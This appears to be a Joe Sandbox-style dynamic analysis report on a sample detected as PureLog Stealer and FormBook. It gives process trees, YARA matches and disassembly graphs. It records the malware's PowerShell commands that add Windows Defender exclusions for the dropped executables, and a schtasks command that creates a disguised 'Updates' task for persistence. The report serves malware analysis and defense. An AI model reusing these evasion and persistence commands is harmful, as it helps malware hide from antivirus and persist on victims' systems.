                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2099884400.0000000004FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086201250.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2090039067.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
                                Imagebase:0xe10000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                                Imagebase:0xe10000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"
                                Imagebase:0x480000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:01:17:59
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:01:18:00
                                Start date:30/08/2024
                                Path:C:\Users\user\Desktop\UnmxRI.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\UnmxRI.exe"
                                Imagebase:0xc60000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:10
                                Start time:01:18:00
                                Start date:30/08/2024
                                Path:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                Imagebase:0x330000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2169047373.0000000002917000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2169047373.0000000002691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2169047373.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 66%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:11
                                Start time:01:18:03
                                Start date:30/08/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:01:18:06
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"
                                Imagebase:0x480000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:01:18:06
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:01:18:06
                                Start date:30/08/2024
                                Path:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                                Imagebase:0x650000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:15
                                Start time:01:18:09
                                Start date:30/08/2024
                                Path:C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe"
                                Imagebase:0xa50000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:16
                                Start time:01:18:11
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\print.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\print.exe"
                                Imagebase:0xdf0000
                                File size:14'848 bytes
                                MD5 hash:B6B0D7357995EFA5F07CEBD4593C7A9C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:18
                                Start time:01:18:23
                                Start date:30/08/2024
                                Path:C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe"
                                Imagebase:0xa50000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Has exited:false

                                General

                                Target ID:19
                                Start time:01:18:39
                                Start date:30/08/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff79f9e0000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:93
                                  Total number of Limit Nodes:6
                                  execution_graph 19296 236d630 DuplicateHandle 19297 236d6c6 19296->19297 19298 6a6fa60 19299 6a6fbeb 19298->19299 19300 6a6fa86 19298->19300 19300->19299 19302 6a6fce0 PostMessageW 19300->19302 19303 6a6fd4c 19302->19303 19303->19300 19304 236cfe0 19305 236d026 GetCurrentProcess 19304->19305 19307 236d071 19305->19307 19308 236d078 GetCurrentThread 19305->19308 19307->19308 19309 236d0b5 GetCurrentProcess 19308->19309 19310 236d0ae 19308->19310 19311 236d0eb 19309->19311 19310->19309 19312 236d113 GetCurrentThreadId 19311->19312 19313 236d144 19312->19313 19314 2364668 19315 236467a 19314->19315 19316 2364686 19315->19316 19320 2364778 19315->19320 19325 2363e28 19316->19325 19318 23646a5 19321 236479d 19320->19321 19329 2364878 19321->19329 19333 2364888 19321->19333 19326 2363e33 19325->19326 19341 2365c44 19326->19341 19328 2366ff0 19328->19318 19330 23648af 19329->19330 19331 236498c 19330->19331 19337 23644b0 19330->19337 19334 23648af 19333->19334 19335 23644b0 CreateActCtxA 19334->19335 19336 236498c 19334->19336 19335->19336 19338 2365918 CreateActCtxA 19337->19338 19340 23659db 19338->19340 19342 2365c4f 19341->19342 19345 2365c64 19342->19345 19344 2367095 19344->19328 19346 2365c6f 19345->19346 19349 2365c94 19346->19349 19348 236717a 19348->19344 19350 2365c9f 19349->19350 19353 2365cc4 19350->19353 19352 236726d 19352->19348 19354 2365ccf 19353->19354 19356 2368310 19354->19356 19361 23685b8 19354->19361 19355 23685a9 19355->19352 19357 236856b 19356->19357 19368 236ac18 19356->19368 19357->19355 19372 236cd17 19357->19372 19362 2368565 19361->19362 19364 23685c7 19361->19364 19365 236856b 19362->19365 19366 236ac18 2 API calls 19362->19366 19363 23685a9 19363->19356 19364->19356 19365->19363 19367 236cd17 2 API calls 19365->19367 19366->19365 19367->19363 19376 236ac50 19368->19376 19379 236ac3f 19368->19379 19369 236ac2e 19369->19357 19374 236cd39 19372->19374 19373 236cd5d 19373->19355 19374->19373 19403 236cec8 19374->19403 19383 236ad48 19376->19383 19377 236ac5f 19377->19369 19380 236ac50 19379->19380 19382 236ad48 2 API calls 19380->19382 19381 236ac5f 19381->19369 19382->19381 19384 236ad59 19383->19384 19385 236ad7c 19383->19385 19384->19385 19391 236afe0 19384->19391 19395 236afd1 19384->19395 19385->19377 19386 236ad74 19386->19385 19387 236af80 GetModuleHandleW 19386->19387 19388 236afad 19387->19388 19388->19377 19392 236aff4 19391->19392 19394 236b019 19392->19394 19399 236a0d0 19392->19399 19394->19386 19396 236aff4 19395->19396 19397 236a0d0 LoadLibraryExW 19396->19397 19398 236b019 19396->19398 19397->19398 19398->19386 19400 236b1c0 LoadLibraryExW 19399->19400 19402 236b239 19400->19402 19402->19394 19405 236ced5 19403->19405 19404 236cf0f 19404->19373 19405->19404 19407 236ba80 19405->19407 19408 236ba8b 19407->19408 19410 236dc28 19408->19410 19411 236d27c 19408->19411 19410->19410 19412 236d287 19411->19412 19413 2365cc4 2 API calls 19412->19413 19414 236dc97 19413->19414 19414->19410

                                  Executed Functions

                                  Function 06A67860 Relevance: 9.8, Strings: 7, Instructions: 1042COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 6a67860-6a67881 295 6a67883 294->295 296 6a67888-6a67974 294->296 295->296 298 6a681a6-6a681ce 296->298 299 6a6797a-6a67ad1 296->299 302 6a688b7-6a688c0 298->302 343 6a67ad7-6a67b32 299->343 344 6a68174-6a681a3 299->344 303 6a688c6-6a688dd 302->303 304 6a681dc-6a681e5 302->304 306 6a681e7 304->306 307 6a681ec-6a682e0 304->307 306->307 325 6a682e2-6a682ee 307->325 326 6a6830a 307->326 329 6a682f0-6a682f6 325->329 330 6a682f8-6a682fe 325->330 328 6a68310-6a68330 326->328 335 6a68332-6a6838b 328->335 336 6a68390-6a6840a 328->336 331 6a68308 329->331 330->331 331->328 348 6a688b4 335->348 354 6a68461-6a684a4 336->354 355 6a6840c-6a6845f 336->355 351 6a67b37-6a67b42 343->351 352 6a67b34 343->352 344->298 348->302 356 6a68086-6a6808c 351->356 352->351 380 6a684af-6a684b5 354->380 355->380 358 6a67b47-6a67b65 356->358 359 6a68092-6a6810f 356->359 361 6a67b67-6a67b6b 358->361 362 6a67bbc-6a67bd1 358->362 398 6a6815e-6a68164 359->398 361->362 367 6a67b6d-6a67b78 361->367 364 6a67bd3 362->364 365 6a67bd8-6a67bee 362->365 364->365 369 6a67bf5-6a67c0c 365->369 370 6a67bf0 365->370 371 6a67bae-6a67bb4 367->371 375 6a67c13-6a67c29 369->375 376 6a67c0e 369->376 370->369 373 6a67bb6-6a67bb7 371->373 374 6a67b7a-6a67b7e 371->374 381 6a67c3a-6a67cab 373->381 383 6a67b84-6a67b9c 374->383 384 6a67b80 374->384 378 6a67c30-6a67c37 375->378 379 6a67c2b 375->379 376->375 378->381 379->378 385 6a6850c-6a68518 380->385 388 6a67cc1-6a67e39 381->388 389 6a67cad 381->389 386 6a67ba3-6a67bab 383->386 387 6a67b9e 383->387 384->383 392 6a684b7-6a684d9 385->392 393 6a6851a-6a685a2 385->393 386->371 387->386 399 6a67e4f-6a67f8a 388->399 400 6a67e3b 388->400 389->388 391 6a67caf-6a67cbb 389->391 391->388 395 6a684e0-6a68509 392->395 396 6a684db 392->396 420 6a68727-6a68730 393->420 395->385 396->395 403 6a68166-6a6816c 398->403 404 6a68111-6a6815b 398->404 412 6a67fee-6a68003 399->412 413 6a67f8c-6a67f90 399->413 400->399 405 6a67e3d-6a67e49 400->405 403->344 404->398 405->399 417 6a68005 412->417 418 6a6800a-6a6802b 412->418 413->412 415 6a67f92-6a67fa1 413->415 419 6a67fe0-6a67fe6 415->419 417->418 422 6a68032-6a68051 418->422 423 6a6802d 418->423 428 6a67fa3-6a67fa7 419->428 429 6a67fe8-6a67fe9 419->429 424 6a68736-6a68791 420->424 425 6a685a7-6a685bc 420->425 426 6a68053 422->426 427 6a68058-6a68078 422->427 423->422 451 6a68793-6a687c6 424->451 452 6a687c8-6a687f2 424->452 432 6a685c5-6a6871b 425->432 433 6a685be 425->433 426->427 434 6a6807f 427->434 435 6a6807a 427->435 430 6a67fb1-6a67fd2 428->430 431 6a67fa9-6a67fad 428->431 436 6a68083 429->436 438 6a67fd4 430->438 439 6a67fd9-6a67fdd 430->439 431->430 456 6a68721 432->456 433->432 440 6a68655-6a68695 433->440 441 6a68610-6a68650 433->441 442 6a6869a-6a686da 433->442 443 6a685cb-6a6860b 433->443 434->436 435->434 436->356 438->439 439->419 440->456 441->456 442->456 443->456 460 6a687fb-6a6888e 451->460 452->460 456->420 464 6a68895-6a688ad 460->464 464->348
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1a[9$3X2$4'jq$TJoq$Tejq$pnq$xbmq
                                  • API String ID: 0-4226763738
                                  • Opcode ID: 15bce456b6ecd85ec61c634296ebabe1dafa804ba2665bdc8f53ce6fbf58e0fc
                                  • Instruction ID: 4ae3c7535dd3afc7894709a34795634fa63995463258aa2c5a082a7f46056c84
                                  • Opcode Fuzzy Hash: 15bce456b6ecd85ec61c634296ebabe1dafa804ba2665bdc8f53ce6fbf58e0fc
                                  • Instruction Fuzzy Hash: 6DB2D574E00628CFDB54DF69C984AD9BBB2FF89304F1581E9E509AB225DB319E81CF50
                                  Function 0236CFD1 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 465 236cfd1-236d06f GetCurrentProcess 469 236d071-236d077 465->469 470 236d078-236d0ac GetCurrentThread 465->470 469->470 471 236d0b5-236d0e9 GetCurrentProcess 470->471 472 236d0ae-236d0b4 470->472 474 236d0f2-236d10d call 236d5b8 471->474 475 236d0eb-236d0f1 471->475 472->471 478 236d113-236d142 GetCurrentThreadId 474->478 475->474 479 236d144-236d14a 478->479 480 236d14b-236d1ad 478->480 479->480
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0236D05E
                                  • GetCurrentThread.KERNEL32 ref: 0236D09B
                                  • GetCurrentProcess.KERNEL32 ref: 0236D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 0236D131
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 17a2c0805db1d3d8e76a382a37da9fb97bdfa7f8387ca6f2e9f7eff61055139f
                                  • Instruction ID: 62cca54b20547c6361f264806b6ccb4789619578baf5c0e5262a532305105e78
                                  • Opcode Fuzzy Hash: 17a2c0805db1d3d8e76a382a37da9fb97bdfa7f8387ca6f2e9f7eff61055139f
                                  • Instruction Fuzzy Hash: F35168B0A003498FDB14DFAAD548BAEBFF5EF88304F20C069D409A7360D7399945CB65
                                  Function 0236CFE0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 487 236cfe0-236d06f GetCurrentProcess 491 236d071-236d077 487->491 492 236d078-236d0ac GetCurrentThread 487->492 491->492 493 236d0b5-236d0e9 GetCurrentProcess 492->493 494 236d0ae-236d0b4 492->494 496 236d0f2-236d10d call 236d5b8 493->496 497 236d0eb-236d0f1 493->497 494->493 500 236d113-236d142 GetCurrentThreadId 496->500 497->496 501 236d144-236d14a 500->501 502 236d14b-236d1ad 500->502 501->502
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0236D05E
                                  • GetCurrentThread.KERNEL32 ref: 0236D09B
                                  • GetCurrentProcess.KERNEL32 ref: 0236D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 0236D131
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: bc721695d9296f7b56d18e56a34a3f5252cc3a1980fcfc91c0308525e65f91a7
                                  • Instruction ID: fc870ced7a22a3095b98d1fdff21f6af5adeb53781dd0123759d4a5d2735de80
                                  • Opcode Fuzzy Hash: bc721695d9296f7b56d18e56a34a3f5252cc3a1980fcfc91c0308525e65f91a7
                                  • Instruction Fuzzy Hash: 105157B09003499FDB14DFAAD548BAEBFF5EF88304F20C069D409A7360D779A944CB65
                                  Function 0236AD48 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 561 236ad48-236ad57 562 236ad83-236ad87 561->562 563 236ad59-236ad66 call 236a06c 561->563 565 236ad9b-236addc 562->565 566 236ad89-236ad93 562->566 568 236ad7c 563->568 569 236ad68 563->569 572 236adde-236ade6 565->572 573 236ade9-236adf7 565->573 566->565 568->562 616 236ad6e call 236afe0 569->616 617 236ad6e call 236afd1 569->617 572->573 574 236ae1b-236ae1d 573->574 575 236adf9-236adfe 573->575 580 236ae20-236ae27 574->580 577 236ae00-236ae07 call 236a078 575->577 578 236ae09 575->578 576 236ad74-236ad76 576->568 579 236aeb8-236af78 576->579 582 236ae0b-236ae19 577->582 578->582 611 236af80-236afab GetModuleHandleW 579->611 612 236af7a-236af7d 579->612 583 236ae34-236ae3b 580->583 584 236ae29-236ae31 580->584 582->580 586 236ae3d-236ae45 583->586 587 236ae48-236ae51 call 236a088 583->587 584->583 586->587 592 236ae53-236ae5b 587->592 593 236ae5e-236ae63 587->593 592->593 594 236ae65-236ae6c 593->594 595 236ae81-236ae85 593->595 594->595 597 236ae6e-236ae7e call 236a098 call 236a0a8 594->597 600 236ae8b-236ae8e 595->600 597->595 602 236ae90-236aeae 600->602 603 236aeb1-236aeb7 600->603 602->603 613 236afb4-236afc8 611->613 614 236afad-236afb3 611->614 612->611 614->613 616->576 617->576
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0236AF9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: dee4d3911b166e90be3b0780f6e15f3e9994af1ec8860b18ba7d0df518bbacae
                                  • Instruction ID: 51d650667daf2ce9caaffbeab229bb17991415d62712877a7f5d19ca8d8923e4
                                  • Opcode Fuzzy Hash: dee4d3911b166e90be3b0780f6e15f3e9994af1ec8860b18ba7d0df518bbacae
                                  • Instruction Fuzzy Hash: BE714970A00B048FDB24DF69D45876ABBF9FF88304F00892DD486EBA54DB75E849CB91
                                  Function 0236590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 618 236590c-23659d9 CreateActCtxA 620 23659e2-2365a3c 618->620 621 23659db-23659e1 618->621 628 2365a3e-2365a41 620->628 629 2365a4b-2365a4f 620->629 621->620 628->629 630 2365a60 629->630 631 2365a51-2365a5d 629->631 633 2365a61 630->633 631->630 633->633
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 023659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 3ca47a94a36895887ba80798d018cd07f6ed53960a2d57399182d1df31b1a476
                                  • Instruction ID: db537cc42717a23573a2534a48808e140c77d4067d2cdd7a7491daa0d3781c5d
                                  • Opcode Fuzzy Hash: 3ca47a94a36895887ba80798d018cd07f6ed53960a2d57399182d1df31b1a476
                                  • Instruction Fuzzy Hash: 0941E2B0C00619CBDB25CFA9C988BDDBBB5BF49304F60806AD408AB255DB766946CF50
                                  Function 023644B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 634 23644b0-23659d9 CreateActCtxA 637 23659e2-2365a3c 634->637 638 23659db-23659e1 634->638 645 2365a3e-2365a41 637->645 646 2365a4b-2365a4f 637->646 638->637 645->646 647 2365a60 646->647 648 2365a51-2365a5d 646->648 650 2365a61 647->650 648->647 650->650
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 023659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 1e9fdda343c1a72cb2cec9eeab1bafad454981248af5d2d9ff9f5789c108c863
                                  • Instruction ID: a60f3ed069219193cd3ebc495d9aa5b918e5a0633f3178f1c52f7653196059cc
                                  • Opcode Fuzzy Hash: 1e9fdda343c1a72cb2cec9eeab1bafad454981248af5d2d9ff9f5789c108c863
                                  • Instruction Fuzzy Hash: EE41E3B0C0071DCBDB25DFAAC848B9DBBF5BF49304F60806AD408AB255DB756946CF90
                                  Function 0236D630 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 656 236d630-236d6c4 DuplicateHandle 657 236d6c6-236d6cc 656->657 658 236d6cd-236d6ea 656->658 657->658
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0236D6B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
